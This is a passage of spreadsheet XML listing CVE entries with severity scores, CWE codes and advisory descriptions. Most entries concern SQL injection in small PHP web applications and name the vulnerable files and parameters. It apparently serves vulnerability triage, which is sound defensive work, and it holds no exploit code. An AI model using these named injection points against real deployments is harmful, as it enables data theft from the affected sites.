          <t>CVE-2026-86159</t>
        </is>
      </c>
      <c r="C4743" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4743" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4743" s="5" t="inlineStr"/>
      <c r="F4743" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4743" s="5" t="inlineStr"/>
      <c r="H4743" s="5" t="inlineStr"/>
      <c r="I4743" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J4743" s="5" t="inlineStr"/>
      <c r="K4743" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L4743" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in SourceCodester Online Voting System 1.0. Impacted is an unknown function of the file /ajax.php?action=save_user. This manipulation of the argument ID causes sql injection. The attack may be initiated remotely. The exploit has been published and may be used.</t>
        </is>
      </c>
      <c r="M4743" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86159</t>
        </is>
      </c>
    </row>
    <row r="4744">
      <c r="A4744" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4744" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86160</t>
        </is>
      </c>
      <c r="C4744" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4744" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4744" s="5" t="inlineStr"/>
      <c r="F4744" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4744" s="5" t="inlineStr"/>
      <c r="H4744" s="5" t="inlineStr"/>
      <c r="I4744" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J4744" s="5" t="inlineStr"/>
      <c r="K4744" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L4744" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in SourceCodester Online Voting System 1.0. The affected element is an unknown function of the file /ajax.php?action=delete_voting. Such manipulation of the argument ID leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.</t>
        </is>
      </c>
      <c r="M4744" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86160</t>
        </is>
      </c>
    </row>
    <row r="4745">
      <c r="A4745" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4745" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86161</t>
        </is>
      </c>
      <c r="C4745" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4745" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4745" s="5" t="inlineStr"/>
      <c r="F4745" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4745" s="5" t="inlineStr"/>
      <c r="H4745" s="5" t="inlineStr"/>
      <c r="I4745" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J4745" s="5" t="inlineStr"/>
      <c r="K4745" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L4745" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in SourceCodester Online Voting System 1.0. The impacted element is an unknown function of the file /ajax.php?action=delete_category. Performing a manipulation of the argument ID results in sql injection. Remote exploitation of the attack is possible. The exploit has been made public and could be used.</t>
        </is>
      </c>
      <c r="M4745" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86161</t>
        </is>
      </c>
    </row>
    <row r="4746">
      <c r="A4746" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4746" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86162</t>
        </is>
      </c>
      <c r="C4746" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4746" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4746" s="5" t="inlineStr"/>
      <c r="F4746" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4746" s="5" t="inlineStr"/>
      <c r="H4746" s="5" t="inlineStr"/>
      <c r="I4746" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J4746" s="5" t="inlineStr"/>
      <c r="K4746" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L4746" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in SourceCodester Online Voting System 1.0. This affects an unknown function of the file /ajax.php?action=login. Executing a manipulation of the argument Username can lead to sql injection. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized.</t>
        </is>
      </c>
      <c r="M4746" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86162</t>
        </is>
      </c>
    </row>
    <row r="4747">
      <c r="A4747" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4747" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86168</t>
        </is>
      </c>
      <c r="C4747" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4747" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4747" s="5" t="inlineStr"/>
      <c r="F4747" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4747" s="5" t="inlineStr"/>
      <c r="H4747" s="5" t="inlineStr"/>
      <c r="I4747" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J4747" s="5" t="inlineStr"/>
      <c r="K4747" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L4747" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in code-projects Content Management System 1.0. The affected element is an unknown function of the file /login.php. The manipulation of the argument user_name results in sql injection. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks.</t>
        </is>
      </c>
      <c r="M4747" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86168</t>
        </is>
      </c>
    </row>
    <row r="4748">
      <c r="A4748" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4748" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86179</t>
        </is>
      </c>
      <c r="C4748" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4748" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4748" s="5" t="inlineStr"/>
      <c r="F4748" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4748" s="5" t="inlineStr"/>
      <c r="H4748" s="5" t="inlineStr"/>
      <c r="I4748" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J4748" s="5" t="inlineStr"/>
      <c r="K4748" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-284</t>
        </is>
      </c>
      <c r="L4748" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in code-projects Daily Expense Manager 1.0. Affected is an unknown function of the file /Daily-Expense-Manager/exp_ak.sql of the component Database Backup Handler. Executing a manipulation can lead to information disclosure. It is possible to launch the attack remotely. The exploit has been published and may be used.</t>
        </is>
      </c>
      <c r="M4748" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86179</t>
        </is>
      </c>
    </row>
    <row r="4749">
      <c r="A4749" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4749" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86180</t>
        </is>
      </c>
      <c r="C4749" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4749" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4749" s="5" t="inlineStr"/>
      <c r="F4749" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4749" s="5" t="inlineStr"/>
      <c r="H4749" s="5" t="inlineStr"/>
      <c r="I4749" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J4749" s="5" t="inlineStr"/>
      <c r="K4749" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L4749" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in code-projects Task Management System In PHP 1.0. Affected by this vulnerability is an unknown functionality of the file /index.php of the component Login. The manipulation of the argument email leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.</t>
        </is>
      </c>
      <c r="M4749" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86180</t>
        </is>
      </c>
    </row>
    <row r="4750">
      <c r="A4750" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4750" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86183</t>
        </is>
      </c>
      <c r="C4750" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4750" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4750" s="5" t="inlineStr"/>
      <c r="F4750" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4750" s="5" t="inlineStr"/>
      <c r="H4750" s="5" t="inlineStr"/>
      <c r="I4750" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J4750" s="5" t="inlineStr"/>
      <c r="K4750" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-639</t>
        </is>
      </c>
      <c r="L4750" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in diem-project diem up to 5.1.3. This vulnerability affects unknown code of the file dmFrontPlugin/modules/dmWidget/lib/BasedmWidgetActions.class.php of the component dmWidget. Such manipulation of the argument widget_id leads to authorization bypass. The attack may be launched remotely. The exploit is publicly available and might be used. The name of the patch is 116974edfb9a5b8bd69cb13586dc62bcdbb485ad. A patch should be applied to remediate this issue. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M4750" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86183</t>
        </is>
      </c>
    </row>
    <row r="4751">
      <c r="A4751" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4751" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86208</t>
        </is>
      </c>
      <c r="C4751" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4751" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4751" s="5" t="inlineStr"/>
      <c r="F4751" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4751" s="5" t="inlineStr"/>
      <c r="H4751" s="5" t="inlineStr"/>
      <c r="I4751" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J4751" s="5" t="inlineStr"/>
      <c r="K4751" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L4751" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in SourceCodester Class and Exam Timetabling System 1.0. This impacts an unknown function of the file /delete_teacher.php. The manipulation of the argument ID results in sql injection. The attack can be launched remotely. The exploit has been released to the public and may be used for attacks.</t>
        </is>
      </c>
      <c r="M4751" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86208</t>
        </is>
      </c>
    </row>
    <row r="4752">
      <c r="A4752" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4752" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86209</t>
        </is>
      </c>
      <c r="C4752" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4752" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4752" s="5" t="inlineStr"/>
      <c r="F4752" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4752" s="5" t="inlineStr"/>
      <c r="H4752" s="5" t="inlineStr"/>
      <c r="I4752" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J4752" s="5" t="inlineStr"/>
      <c r="K4752" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L4752" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in SourceCodester Class and Exam Timetabling System 1.0. Affected is an unknown function of the file /delete_user.php. This manipulation of the argument ID causes sql injection. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks.</t>
        </is>
      </c>
      <c r="M4752" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86209</t>
        </is>
      </c>
    </row>
    <row r="4753">
      <c r="A4753" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4753" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86210</t>
        </is>
      </c>
      <c r="C4753" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4753" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4753" s="5" t="inlineStr"/>
      <c r="F4753" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4753" s="5" t="inlineStr"/>
      <c r="H4753" s="5" t="inlineStr"/>
      <c r="I4753" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J4753" s="5" t="inlineStr"/>
      <c r="K4753" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L4753" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in SourceCodester Class and Exam Timetabling System 1.0. Affected by this vulnerability is an unknown functionality of the file /delete_user_account.php. Such manipulation of the argument ID leads to sql injection. The attack may be launched remotely. The exploit has been disclosed publicly and may be used.</t>
        </is>
      </c>
      <c r="M4753" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86210</t>
        </is>
      </c>
    </row>
    <row r="4754">
      <c r="A4754" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4754" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86211</t>
        </is>
      </c>
      <c r="C4754" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4754" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4754" s="5" t="inlineStr"/>
      <c r="F4754" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4754" s="5" t="inlineStr"/>
      <c r="H4754" s="5" t="inlineStr"/>
      <c r="I4754" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J4754" s="5" t="inlineStr"/>
      <c r="K4754" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L4754" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in rabindralamsal inventory-management-system 1.0.0. This affects an unknown part of the file index.php of the component Login. Executing a manipulation of the argument username/password can lead to sql injection. The attack can be executed remotely. The exploit has been published and may be used.</t>
        </is>
      </c>
      <c r="M4754" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86211</t>
        </is>
      </c>
    </row>
    <row r="4755">
      <c r="A4755" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4755" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86213</t>
        </is>
      </c>
      <c r="C4755" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4755" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4755" s="5" t="inlineStr"/>
      <c r="F4755" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4755" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="H4755" s="5" t="inlineStr"/>
      <c r="I4755" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J4755" s="5" t="inlineStr"/>
      <c r="K4755" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L4755" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in Mstfakts College-Management-System. This issue affects the function mysqli_query of the file Front-end/university.php of the component Search Handler. The manipulation of the argument book_name/book_author results in sql injection. The attack may be performed from remote. The exploit has been made public and could be used. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M4755" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86213</t>
        </is>
      </c>
    </row>
    <row r="4756">
      <c r="A4756" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4756" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86214</t>
        </is>
      </c>
      <c r="C4756" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4756" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4756" s="5" t="inlineStr"/>
      <c r="F4756" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4756" s="5" t="inlineStr"/>
      <c r="H4756" s="5" t="inlineStr"/>
      <c r="I4756" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J4756" s="5" t="inlineStr"/>
      <c r="K4756" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L4756" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in Mstfakts College-Management-System. Impacted is an unknown function of the file Front-end/login.php. This manipulation of the argument email causes improper authentication. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M4756" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86214</t>
        </is>
      </c>
    </row>
    <row r="4757">
      <c r="A4757" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4757" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86217</t>
        </is>
      </c>
      <c r="C4757" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4757" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4757" s="5" t="inlineStr"/>
      <c r="F4757" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4757" s="5" t="inlineStr"/>
      <c r="H4757" s="5" t="inlineStr"/>
      <c r="I4757" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J4757" s="5" t="inlineStr"/>
      <c r="K4757" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-284</t>
        </is>
      </c>
      <c r="L4757" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in code-projects Hotel and Tourism Reservation in PHP 1.0. Affected is an unknown function of the file /ht/hotel_db%20(1).sql of the component Database Backup Handler. The manipulation results in information disclosure. The attack may be launched remotely. The exploit is now public and may be used.</t>
        </is>
      </c>
      <c r="M4757" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86217</t>
        </is>
      </c>
    </row>
    <row r="4758">
      <c r="A4758" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4758" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86220</t>
        </is>
      </c>
      <c r="C4758" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4758" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4758" s="5" t="inlineStr"/>
      <c r="F4758" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4758" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="H4758" s="5" t="inlineStr"/>
      <c r="I4758" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J4758" s="5" t="inlineStr"/>
      <c r="K4758" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L4758" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in SourceCodester Class and Exam Timetabling System 1.0. The affected element is the function mysqli_query of the file /admin/modal_add_course.php. The manipulation of the argument course results in sql injection. The attack can be launched remotely. The exploit is now public and may be used.</t>
        </is>
      </c>
      <c r="M4758" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86220</t>
        </is>
      </c>
    </row>
    <row r="4759">
      <c r="A4759" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4759" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86221</t>
        </is>
      </c>
      <c r="C4759" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4759" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4759" s="5" t="inlineStr"/>
      <c r="F4759" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4759" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="H4759" s="5" t="inlineStr"/>
      <c r="I4759" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J4759" s="5" t="inlineStr"/>
      <c r="K4759" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L4759" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in SourceCodester Class and Exam Timetabling System 1.0. The impacted element is the function mysqli_query of the file /admin/modal_add_course1.php. This manipulation of the argument course causes sql injection. The attack may be initiated remotely. The exploit has been published and may be used.</t>
        </is>
      </c>
      <c r="M4759" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86221</t>
        </is>
      </c>
    </row>
    <row r="4760">
      <c r="A4760" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4760" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86222</t>
        </is>
      </c>
      <c r="C4760" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4760" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4760" s="5" t="inlineStr"/>
      <c r="F4760" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4760" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="H4760" s="5" t="inlineStr"/>
      <c r="I4760" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J4760" s="5" t="inlineStr"/>
      <c r="K4760" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L4760" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in SourceCodester Class and Exam Timetabling System 1.0. This affects the function mysqli_query of the file /admin/modal_add_course2.php. Such manipulation of the argument course leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.</t>
        </is>
      </c>
      <c r="M4760" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86222</t>
        </is>
      </c>
    </row>
    <row r="4761">
      <c r="A4761" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4761" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86223</t>
        </is>
      </c>
      <c r="C4761" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4761" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4761" s="5" t="inlineStr"/>
      <c r="F4761" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4761" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="H4761" s="5" t="inlineStr"/>
      <c r="I4761" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J4761" s="5" t="inlineStr"/>
      <c r="K4761" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L4761" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in SourceCodester Class and Exam Timetabling System 1.0. This impacts the function mysqli_query of the file /admin/modal_add_coursea.php. Performing a manipulation of the argument course results in sql injection. Remote exploitation of the attack is possible. The exploit has been made public and could be used.</t>
        </is>
      </c>
      <c r="M4761" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86223</t>
        </is>
      </c>
    </row>
    <row r="4762">
      <c r="A4762" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4762" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86224</t>
        </is>
      </c>
      <c r="C4762" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4762" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4762" s="5" t="inlineStr"/>
      <c r="F4762" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4762" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="H4762" s="5" t="inlineStr"/>
      <c r="I4762" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J4762" s="5" t="inlineStr"/>
      <c r="K4762" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L4762" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in SourceCodester Class and Exam Timetabling System 1.0. Affected is the function mysqli_query of the file /admin/modal_add_product.php. Executing a manipulation of the argument fname can lead to sql injection. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized.</t>
        </is>
      </c>
      <c r="M4762" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86224</t>
        </is>
      </c>
    </row>
    <row r="4763">
      <c r="A4763" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4763" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86225</t>
        </is>
      </c>
      <c r="C4763" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4763" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4763" s="5" t="inlineStr"/>
      <c r="F4763" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4763" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="H4763" s="5" t="inlineStr"/>
      <c r="I4763" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J4763" s="5" t="inlineStr"/>
      <c r="K4763" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L4763" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in SourceCodester Class and Exam Timetabling System 1.0. Affected by this vulnerability is the function mysqli_query of the file /admin/modal_add_room.php. The manipulation of the argument room_name leads to sql injection. The attack is possible to be carried out remotely. The exploit is publicly available and might be used.</t>
        </is>
      </c>
      <c r="M4763" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86225</t>
        </is>
      </c>
    </row>
    <row r="4764">
      <c r="A4764" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4764" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86237</t>
        </is>
      </c>
      <c r="C4764" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4764" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4764" s="5" t="inlineStr"/>
      <c r="F4764" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G4764" s="5" t="inlineStr"/>
      <c r="H4764" s="5" t="inlineStr"/>
      <c r="I4764" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4764" s="5" t="inlineStr"/>
      <c r="K4764" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L4764" s="5" t="inlineStr">
        <is>
